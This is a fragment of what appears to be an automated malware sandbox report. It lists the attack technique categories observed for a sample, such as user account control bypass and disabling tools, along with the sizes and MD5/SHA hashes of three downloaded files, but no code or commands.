1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD50e47f8303bbe04955f01b20fd34feb26
SHA1dafcd8d2c37cb9911123adc618fc0d08ee0eb684
SHA2566ef2e59fe5d56b09004ed1616d2f6623246fc7340c1a0d5ba723faa44e80ec7d
SHA51253c1eb49ebb5b1bc292198fe325aa3798d154319e9a7e847d8cfab1ae4404fa753b0ebd075cd0c61558bcf9467e6bfa032faf3e1ca7f9299c5d5737ccab788ca
-
Filesize
12KB
MD5ffda244fe79dd6a4cf87a9e2b68c9343
SHA1a380f9f457736fd28b1de4d9e3cca349e45bb5fb
SHA256fea285b57a4889f7bb93071c626ade6557d820e50fe37a1fb8a73f0ee2a1cdb1
SHA5121063a573fd6481c64b08bad80401cc7055e5a13d36e735cf36d0cee5d6f3405ffaebea5288a5d98c827a3067f9d8136ec27220f6cddb9c391c602fd8b1bd6039
-
Filesize
684B
MD5f3460c8f81b289a09804a3acf28e9c64
SHA100d3743181e4e35b2a5a38999a16a20e267b767d
SHA2567724fd3a1b41a4d518b8617f6bfdfe87342da5d8a5b541821db972cc7abd9b41
SHA512854150d70e8fc72b5df79e14ff6bcdd840714e2a1b202d87cbace02a1bb464aa1ccf3064e2c71d125bdeee91e6d3bc3e35ecca2b95324d36df5811b7d184b386